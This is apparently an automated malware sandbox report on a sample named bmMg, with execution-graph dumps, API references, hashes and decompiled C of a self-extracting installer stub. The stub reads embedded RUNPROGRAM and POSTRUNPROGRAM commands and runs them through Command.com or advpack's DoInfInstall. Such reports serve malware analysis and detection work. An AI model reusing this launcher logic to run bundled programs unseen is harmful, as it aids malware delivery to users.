                                                                      • Opcode Fuzzy Hash: 03beb55f843d125f16ebe8b07d097d53592d5bef2518dcd612903b9c3548e362
                                                                      • Instruction Fuzzy Hash: B1F015745073228FCB3DAB36F50A6093BA1FB15339B104629E4B2862D8CF3A85C0CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:26.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:969
                                                                      Total number of Limit Nodes:43
SetFileAttributesA 3096 f847db 3094->3096 3096->3077 3097 f86517 24 API calls 3098 f847b1 3097->3098 3098->3094 3098->3096 3099 f847c2 3098->3099 3099->3094 3101 f8480f LocalAlloc 3100->3101 3102 f847f6 3100->3102 3105 f84831 3101->3105 3108 f8480b 3101->3108 3103 f844b9 20 API calls 3102->3103 3103->3108 3106 f844b9 20 API calls 3105->3106 3107 f84846 LocalFree 3106->3107 3107->3108 3108->3085 3110 f84777 3109->3110 3110->3093 3110->3094 3110->3097 3111 f84ad0 3119 f83680 3111->3119 3114 f84ae9 3115 f84aee WriteFile 3116 f84b0f 3115->3116 3117 f84b14 3115->3117 3117->3116 3118 f84b3b SendDlgItemMessageA 3117->3118 3118->3116 3120 f83691 MsgWaitForMultipleObjects 3119->3120 3121 f836e8 3120->3121 3122 f836a9 PeekMessageA 3120->3122 3121->3114 3121->3115 3122->3120 3123 f836bc 3122->3123 3123->3120 3123->3121 3124 f836c7 DispatchMessageA 3123->3124 3125 f836d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 f84a50 3184 f84a9f ReadFile 3183->3184 3185 f84a66 3183->3185 3186 f84abb 3184->3186 3185->3186 3187 f84a82 memcpy 3185->3187 3187->3186 3188 f83450 3189 f8345e 3188->3189 3190 f834d3 EndDialog 3188->3190 3191 f8349a GetDesktopWindow 3189->3191 3196 f83465 3189->3196 3192 f8346a 3190->3192 3193 f843d0 11 API calls 3191->3193 3194 f834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3193->3194 3194->3192 3195 f8348c EndDialog 3195->3192 3196->3192 3196->3195 3197 f83210 3198 f83227 3197->3198 3223 f8328e EndDialog 3197->3223 3199 f833e2 GetDesktopWindow 3198->3199 3202 f83235 3198->3202 3201 f843d0 11 API calls 3199->3201 3203 f833f1 SetWindowTextA SendDlgItemMessageA 3201->3203 3204 f8324c 3202->3204 3205 f832dd GetDlgItemTextA 3202->3205 3215 f83239 3202->3215 3206 f8341f GetDlgItem EnableWindow 3203->3206 3203->3215 3208 f83251 3204->3208 3209 f832c5 EndDialog 3204->3209 3207 f83366 3205->3207 3216 f832fc 3205->3216 3206->3215 3211 f844b9 20 API calls 3207->3211 3210 f8325c LoadStringA 3208->3210 3208->3215 3209->3215 3212 f8327b 3210->3212 3213 f83294 
3210->3213 3211->3215 3219 f844b9 20 API calls 3212->3219 3235 f84224 LoadLibraryA 3213->3235 3216->3207 3218 f83331 GetFileAttributesA 3216->3218 3221 f8337c 3218->3221 3222 f8333f 3218->3222 3219->3223 3220 f832a5 SetDlgItemTextA 3220->3212 3220->3215 3224 f8658a CharPrevA 3221->3224 3225 f844b9 20 API calls 3222->3225 3223->3215 3227 f8338d 3224->3227 3226 f83351 3225->3226 3226->3215 3228 f8335a CreateDirectoryA 3226->3228 3229 f858c8 27 API calls 3227->3229 3228->3207 3228->3221 3230 f83394 3229->3230 3230->3207 3231 f833a4 3230->3231 3232 f833c7 EndDialog 3231->3232 3233 f8597d 34 API calls 3231->3233 3232->3215 3234 f833c3 3233->3234 3234->3215 3234->3232 3236 f843b2 3235->3236 3237 f84246 GetProcAddress 3235->3237 3241 f844b9 20 API calls 3236->3241 3238 f8425d GetProcAddress 3237->3238 3239 f843a4 FreeLibrary 3237->3239 3238->3239 3240 f84274 GetProcAddress 3238->3240 3239->3236 3240->3239 3242 f8428b 3240->3242 3244 f8329d 3241->3244 3243 f84295 GetTempPathA 3242->3243 3249 f842e1 3242->3249 3245 f842ad 3243->3245 3244->3215 3244->3220 3245->3245 3246 f842b4 CharPrevA 3245->3246 3247 f842d0 CharPrevA 3246->3247 3246->3249 3247->3249 3248 f84390 FreeLibrary 3248->3244 3249->3248 3126 f84cc0 GlobalFree 3127 f86f40 SetUnhandledExceptionFilter 3250 f84bc0 3252 f84bd7 3250->3252 3253 f84c05 3250->3253 3251 f84c1b SetFilePointer 3251->3252 3253->3251 3253->3252 3254 f830c0 3255 f830de CallWindowProcA 3254->3255 3256 f830ce 3254->3256 3257 f830da 3255->3257 3256->3255 3256->3257 3258 f863c0 3259 f86407 3258->3259 3260 f8658a CharPrevA 3259->3260 3261 f86415 CreateFileA 3260->3261 3262 f86448 WriteFile 3261->3262 3263 f8643a 3261->3263 3264 f86465 CloseHandle 3262->3264 3266 f86ce0 4 API calls 3263->3266 3264->3263 3267 f8648f 3266->3267 3268 f83100 3269 f831b0 3268->3269 3270 f83111 3268->3270 3272 f831b9 SendDlgItemMessageA 3269->3272 3275 f83141 3269->3275 3271 f8311d 3270->3271 3273 f83149 GetDesktopWindow 3270->3273 3274 f83138 EndDialog 3271->3274 
3271->3275 3272->3275 3276 f843d0 11 API calls 3273->3276 3274->3275 3277 f8315d 6 API calls 3276->3277 3277->3275 3278 f84200 3279 f8420b SendMessageA 3278->3279 3280 f8421e 3278->3280 3279->3280 3281 f86c03 3282 f86c1e 3281->3282 3283 f86c17 _exit 3281->3283 3284 f86c27 _cexit 3282->3284 3285 f86c32 3282->3285 3283->3282 3284->3285


                                                                      Control-flow Graph

                                                                      C-Code - Quality: 82%
                                                                      			E00F83BA2() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				short _v300;
                                                                      				intOrPtr _v304;
                                                                      				void _v348;
                                                                      				char _v352;
                                                                      				intOrPtr _v356;
                                                                      				signed int _v360;
                                                                      				short _v364;
                                                                      				char* _v368;
                                                                      				intOrPtr _v372;
                                                                      				void* _v376;
                                                                      				intOrPtr _v380;
                                                                      				char _v384;
                                                                      				signed int _v388;
                                                                      				intOrPtr _v392;
                                                                      				signed int _v396;
                                                                      				signed int _v400;
                                                                      				signed int _v404;
                                                                      				void* _v408;
                                                                      				void* _v424;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t69;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t79;
                                                                      				short _t96;
                                                                      				signed int _t97;
                                                                      				intOrPtr _t98;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				signed int _t108;
                                                                      				int _t112;
                                                                      				void* _t115;
                                                                      				signed char _t118;
                                                                      				void* _t125;
                                                                      				signed int _t127;
                                                                      				void* _t128;
                                                                      				struct HINSTANCE__* _t129;
                                                                      				void* _t130;
                                                                      				short _t137;
                                                                      				char* _t140;
                                                                      				signed char _t144;
                                                                      				signed char _t145;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				void* _t151;
                                                                      				signed int _t153;
                                                                      				void* _t155;
                                                                      				void* _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				void* _t165;
                                                                      
                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                      				_t69 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t69 ^ _t164;
                                                                      				_t153 = 0;
                                                                      				 *0xf89124 =  *0xf89124 & 0;
                                                                      				_t149 = 0;
                                                                      				_v388 = 0;
                                                                      				_v384 = 0;
                                                                      				_t165 =  *0xf88a28 - _t153; // 0x0
                                                                      				if(_t165 != 0) {
                                                                      					L3:
                                                                      					_t127 = 0;
                                                                      					_v392 = 0;
                                                                      					while(1) {
                                                                      						_v400 = _v400 & 0x00000000;
                                                                      						memset( &_v348, 0, 0x44);
                                                                      						_t164 = _t164 + 0xc;
                                                                      						_v348 = 0x44;
                                                                      						if( *0xf88c42 != 0) {
                                                                      							goto L26;
                                                                      						}
                                                                      						_t146 =  &_v396;
                                                                      						_t115 = E00F8468F("SHOWWINDOW",  &_v396, 4);
                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                      							L25:
                                                                      							_t146 = 0x4b1;
                                                                      							E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      							 *0xf89124 = 0x80070714;
                                                                      							goto L62;
                                                                      						} else {
                                                                      							if(_v396 != 1) {
                                                                      								__eflags = _v396 - 2;
                                                                      								if(_v396 != 2) {
                                                                      									_t137 = 3;
                                                                      									__eflags = _v396 - _t137;
                                                                      									if(_v396 == _t137) {
                                                                      										_v304 = 1;
                                                                      										_v300 = _t137;
                                                                      									}
                                                                      									goto L14;
                                                                      								}
                                                                      								_push(6);
                                                                      								_v304 = 1;
                                                                      								_pop(0);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_v304 = 1;
                                                                      								L11:
                                                                      								_v300 = 0;
                                                                      								L14:
                                                                      								if(_t127 != 0) {
                                                                      									L27:
                                                                      									_t155 = 1;
                                                                      									__eflags = _t127 - 1;
                                                                      									if(_t127 != 1) {
                                                                      										L31:
                                                                      										_t132 =  &_v280;
                                                                      										_t76 = E00F81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                      										__eflags = _t76;
                                                                      										if(_t76 == 0) {
                                                                      											L62:
                                                                      											_t77 = 0;
                                                                      											L63:
                                                                      											_pop(_t150);
                                                                      											_pop(_t156);
                                                                      											_pop(_t128);
                                                                      											return E00F86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                      										}
                                                                      										_t157 = _v404;
                                                                      										__eflags = _t149;
                                                                      										if(_t149 != 0) {
                                                                      											L37:
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												L57:
                                                                      												_t151 = _v408;
                                                                      												_t146 =  &_v352;
                                                                      												_t130 = _t151; // executed
                                                                      												_t79 = E00F83FEF(_t130,  &_v352); // executed
                                                                      												__eflags = _t79;
                                                                      												if(_t79 == 0) {
                                                                      													L61:
                                                                      													LocalFree(_t151);
                                                                      													goto L62;
                                                                      												}
                                                                      												L58:
                                                                      												LocalFree(_t151);
                                                                      												_t127 = _t127 + 1;
                                                                      												_v396 = _t127;
                                                                      												__eflags = _t127 - 2;
                                                                      												if(_t127 >= 2) {
                                                                      													_t155 = 1;
                                                                      													__eflags = 1;
                                                                      													L69:
                                                                      													__eflags =  *0xf88580;
                                                                      													if( *0xf88580 != 0) {
                                                                      														E00F82267();
                                                                      													}
                                                                      													_t77 = _t155;
                                                                      													goto L63;
                                                                      												}
                                                                      												_t153 = _v392;
                                                                      												_t149 = _v388;
                                                                      												continue;
                                                                      											}
                                                                      											L38:
                                                                      											__eflags =  *0xf88180;
                                                                      											if( *0xf88180 == 0) {
                                                                      												_t146 = 0x4c7;
                                                                      												E00F844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                      												LocalFree(_v424);
                                                                      												 *0xf89124 = 0x8007042b;
                                                                      												goto L62;
                                                                      											}
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											__eflags =  *0xf89a34 & 0x00000004;
                                                                      											if(__eflags == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											_t129 = E00F86495(_t127, _t132, _t157, __eflags);
                                                                      											__eflags = _t129;
                                                                      											if(_t129 == 0) {
                                                                      												_t146 = 0x4c8;
                                                                      												E00F844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                      												L65:
                                                                      												LocalFree(_v408);
                                                                      												 *0xf89124 = E00F86285();
                                                                      												goto L62;
                                                                      											}
                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                      											_v404 = _t146;
                                                                      											__eflags = _t146;
                                                                      											if(_t146 == 0) {
                                                                      												_t146 = 0x4c9;
                                                                      												__eflags = 0;
                                                                      												E00F844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                      												FreeLibrary(_t129);
                                                                      												goto L65;
                                                                      											}
                                                                      											__eflags =  *0xf88a30;
                                                                      											_t151 = _v408;
                                                                      											_v384 = 0;
                                                                      											_v368 =  &_v280;
                                                                      											_t96 =  *0xf89a40; // 0x3
                                                                      											_v364 = _t96;
                                                                      											_t97 =  *0xf88a38 & 0x0000ffff;
                                                                      											_v380 = 0xf89154;
                                                                      											_v376 = _t151;
                                                                      											_v372 = 0xf891e4;
                                                                      											_v360 = _t97;
                                                                      											if( *0xf88a30 != 0) {
                                                                      												_t97 = _t97 | 0x00010000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t144 =  *0xf89a34; // 0x1
                                                                      											__eflags = _t144 & 0x00000008;
                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                      												_t97 = _t97 | 0x00020000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t144 & 0x00000010;
                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                      												_t97 = _t97 | 0x00040000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											_t145 =  *0xf88d48; // 0x0
                                                                      											__eflags = _t145 & 0x00000040;
                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                      												_t97 = _t97 | 0x00080000;
                                                                      												__eflags = _t97;
                                                                      												_v360 = _t97;
                                                                      											}
                                                                      											__eflags = _t145;
                                                                      											if(_t145 < 0) {
                                                                      												_t104 = _t97 | 0x00100000;
                                                                      												__eflags = _t104;
                                                                      												_v360 = _t104;
                                                                      											}
                                                                      											_t98 =  *0xf89a38; // 0x0
                                                                      											_v356 = _t98;
                                                                      											_t130 = _t146;
                                                                      											 *0xf8a288( &_v384);
                                                                      											_t101 = _v404();
                                                                      											__eflags = _t164 - _t164;
                                                                      											if(_t164 != _t164) {
                                                                      												_t130 = 4;
                                                                      												asm("int 0x29");
                                                                      											}
                                                                      											 *0xf89124 = _t101;
                                                                      											_push(_t129);
                                                                      											__eflags = _t101;
                                                                      											if(_t101 < 0) {
                                                                      												FreeLibrary();
                                                                      												goto L61;
                                                                      											} else {
                                                                      												FreeLibrary();
                                                                      												_t127 = _v400;
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *0xf89a40 - 1; // 0x3
                                                                      										if(__eflags == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags =  *0xf88a20;
                                                                      										if( *0xf88a20 == 0) {
                                                                      											goto L37;
                                                                      										}
                                                                      										__eflags = _t157;
                                                                      										if(_t157 != 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_v388 = 1;
                                                                      										E00F8202A(_t146); // executed
                                                                      										goto L37;
                                                                      									}
                                                                      									_t146 =  &_v280;
                                                                      									_t108 = E00F8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                      									__eflags = _t108;
                                                                      									if(_t108 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									__eflags =  *0xf88c42;
                                                                      									if( *0xf88c42 != 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                      									__eflags = _t112 == 0;
                                                                      									if(_t112 == 0) {
                                                                      										goto L69;
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t118 =  *0xf88a38; // 0x0
                                                                      								if(_t118 == 0) {
                                                                      									L23:
                                                                      									if(_t153 != 0) {
                                                                      										goto L31;
                                                                      									}
                                                                      									_t146 =  &_v276;
                                                                      									if(E00F8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                      										goto L27;
                                                                      									}
                                                                      									goto L25;
                                                                      								}
                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                      									__eflags = _t118 & 0x00000002;
                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									_t140 = "USRQCMD";
                                                                      									L20:
                                                                      									_t146 =  &_v276;
                                                                      									if(E00F8468F(_t140,  &_v276, 0x104) == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                      										_t153 = 1;
                                                                      										_v388 = 1;
                                                                      									}
                                                                      									goto L23;
                                                                      								}
                                                                      								_t140 = "ADMQCMD";
                                                                      								goto L20;
                                                                      							}
                                                                      						}
                                                                      						L26:
                                                                      						_push(_t130);
                                                                      						_t146 = 0x104;
                                                                      						E00F81781( &_v276, 0x104, _t130, 0xf88c42);
                                                                      						goto L27;
                                                                      					}
                                                                      				}
                                                                      				_t130 = "REBOOT";
                                                                      				_t125 = E00F8468F(_t130, 0xf89a2c, 4);
                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                      					goto L25;
                                                                      				} else {
                                                                      					goto L3;
                                                                      				}
                                                                      			}
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83dd9
                                                                      0x00f83ddb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83ddd
                                                                      0x00f83de1
                                                                      0x00000000
                                                                      0x00f83de1
                                                                      0x00f83d59
                                                                      0x00f83d65
                                                                      0x00f83d6a
                                                                      0x00f83d6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d6e
                                                                      0x00f83d75
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d8f
                                                                      0x00f83d96
                                                                      0x00f83d98
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d98
                                                                      0x00f83c8f
                                                                      0x00f83c98
                                                                      0x00f83cf1
                                                                      0x00f83cf3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83cfe
                                                                      0x00f83d11
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83d11
                                                                      0x00f83c9c
                                                                      0x00f83ca5
                                                                      0x00f83ca7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83cad
                                                                      0x00f83cb2
                                                                      0x00f83cb7
                                                                      0x00f83cc5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83ce8
                                                                      0x00f83cec
                                                                      0x00f83ced
                                                                      0x00f83ced
                                                                      0x00000000
                                                                      0x00f83ce8
                                                                      0x00f83c9e
                                                                      0x00000000
                                                                      0x00f83c9e
                                                                      0x00f83c56
                                                                      0x00f83d35
                                                                      0x00f83d35
                                                                      0x00f83d3c
                                                                      0x00f83d48
                                                                      0x00000000
                                                                      0x00f83d48
                                                                      0x00f83c03
                                                                      0x00f83be2
                                                                      0x00f83be7
                                                                      0x00f83bee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F83C11
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F83CDC
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F88C42), ref: 00F83D8F
                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F83E26
                                                                      • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83EFF
                                                                      • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F1F
                                                                      • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83F40
                                                                      • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F47
                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F88C42), ref: 00F83F76
                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83F80
                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83FC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                      • API String ID: 1032054927-3996648855
                                                                      • Opcode ID: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                      • Instruction ID: a568d07caecc8feb6d8a913719d33642b45830e34247fb3029338a0eecd9d0eb
                                                                      • Opcode Fuzzy Hash: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                      • Instruction Fuzzy Hash: 30B11371A083059BD724FF248C45BFB76E4EB85B60F00092EFA85D61A1EB74D905FB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      C-Code - Quality: 82%
                                                                      			E00F81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v527;
                                                                      				char _v528;
                                                                      				char _v1552;
                                                                      				CHAR* _v1556;
                                                                      				int* _v1560;
                                                                      				CHAR** _v1564;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t48;
                                                                      				CHAR* _t53;
                                                                      				CHAR* _t54;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				CHAR* _t60;
                                                                      				void* _t62;
                                                                      				signed char _t65;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t77;
                                                                      				unsigned int _t85;
                                                                      				CHAR* _t90;
                                                                      				CHAR* _t92;
                                                                      				char _t105;
                                                                      				char _t106;
                                                                      				CHAR** _t111;
                                                                      				CHAR* _t115;
                                                                      				intOrPtr* _t125;
                                                                      				void* _t126;
                                                                      				CHAR* _t132;
                                                                      				CHAR* _t135;
                                                                      				void* _t138;
                                                                      				void* _t139;
                                                                      				void* _t145;
                                                                      				intOrPtr* _t146;
                                                                      				char* _t148;
                                                                      				CHAR* _t151;
                                                                      				void* _t152;
                                                                      				CHAR* _t155;
                                                                      				CHAR* _t156;
                                                                      				void* _t157;
                                                                      				signed int _t158;
                                                                      
                                                                      				_t48 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t48 ^ _t158;
                                                                      				_t108 = __ecx;
                                                                      				_v1564 = _a4;
                                                                      				_v1560 = _a8;
                                                                      				E00F81680( &_v528, 0x104, __ecx);
                                                                      				if(_v528 != 0x22) {
                                                                      					_t135 = " ";
                                                                      					_t53 =  &_v528;
                                                                      				} else {
                                                                      					_t135 = "\"";
                                                                      					_t53 =  &_v527;
                                                                      				}
                                                                      				_t111 =  &_v1556;
                                                                      				_v1556 = _t53;
                                                                      				_t54 = E00F81A84(_t111, _t135);
                                                                      				_t156 = _v1556;
                                                                      				_t151 = _t54;
                                                                      				if(_t156 == 0) {
                                                                      					L12:
                                                                      					_push(_t111);
                                                                      					E00F81781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      					E00F8658A( &_v268, 0x104, _t156);
                                                                      					goto L13;
                                                                      				} else {
                                                                      					_t132 = _t156;
                                                                      					_t148 =  &(_t132[1]);
                                                                      					do {
                                                                      						_t105 =  *_t132;
                                                                      						_t132 =  &(_t132[1]);
                                                                      					} while (_t105 != 0);
                                                                      					_t111 = _t132 - _t148;
                                                                      					if(_t111 < 3) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t106 = _t156[1];
                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      					} else {
                                                                      						L11:
                                                                      						E00F81680( &_v268, 0x104, _t156);
                                                                      						L13:
                                                                      						_t138 = 0x2e;
                                                                      						_t57 = E00F866C8(_t156, _t138);
                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                      							_t139 = 0x2e;
                                                                      							_t115 = _t156;
                                                                      							_t58 = E00F866C8(_t115, _t139);
                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                      								if(_t156 == 0) {
                                                                      									goto L43;
                                                                      								}
                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                      									E00F81680( &_v1552, 0x400, _t108);
                                                                      								} else {
                                                                      									_push(_t115);
                                                                      									_t108 = 0x400;
                                                                      									E00F81781( &_v1552, 0x400, _t115,  &_v268);
                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                      										E00F816B3( &_v1552, 0x400, " ");
                                                                      										E00F816B3( &_v1552, 0x400, _t151);
                                                                      									}
                                                                      								}
                                                                      								_t140 = _t156;
                                                                      								 *_t156 = 0;
                                                                      								E00F82AAC( &_v1552, _t156, _t156);
                                                                      								goto L53;
                                                                      							} else {
                                                                      								_t108 = "Command.com /c %s";
                                                                      								_t125 = "Command.com /c %s";
                                                                      								_t145 = _t125 + 1;
                                                                      								do {
                                                                      									_t76 =  *_t125;
                                                                      									_t125 = _t125 + 1;
                                                                      								} while (_t76 != 0);
                                                                      								_t126 = _t125 - _t145;
                                                                      								_t146 =  &_v268;
                                                                      								_t157 = _t146 + 1;
                                                                      								do {
                                                                      									_t77 =  *_t146;
                                                                      									_t146 = _t146 + 1;
                                                                      								} while (_t77 != 0);
                                                                      								_t140 = _t146 - _t157;
                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                      								if(_t156 != 0) {
                                                                      									E00F8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L43;
                                                                      							}
                                                                      						} else {
                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                      								_t140 = 0x525;
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_t60 =  &_v268;
                                                                      								goto L35;
                                                                      							} else {
                                                                      								_t140 = "[";
                                                                      								_v1556 = _t151;
                                                                      								_t90 = E00F81A84( &_v1556, "[");
                                                                      								if(_t90 != 0) {
                                                                      									if( *_t90 != 0) {
                                                                      										_v1556 = _t90;
                                                                      									}
                                                                      									_t140 = "]";
                                                                      									E00F81A84( &_v1556, "]");
                                                                      								}
                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                      								if(_t156 == 0) {
                                                                      									L43:
                                                                      									_t60 = 0;
                                                                      									_t140 = 0x4b5;
                                                                      									_push(0);
                                                                      									_push(0x10);
                                                                      									_push(0);
                                                                      									L35:
                                                                      									_push(_t60);
                                                                      									E00F844B9(0, _t140);
                                                                      									_t62 = 0;
                                                                      									goto L54;
                                                                      								} else {
                                                                      									_t155 = _v1556;
                                                                      									_t92 = _t155;
                                                                      									if( *_t155 == 0) {
                                                                      										_t92 = "DefaultInstall";
                                                                      									}
                                                                      									 *0xf89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                      									 *_v1560 = 1;
                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf81140, _t156, 8,  &_v268) == 0) {
                                                                      										 *0xf89a34 =  *0xf89a34 & 0xfffffffb;
                                                                      										if( *0xf89a40 != 0) {
                                                                      											_t108 = "setupapi.dll";
                                                                      										} else {
                                                                      											_t108 = "setupx.dll";
                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                      										}
                                                                      										if( *_t155 == 0) {
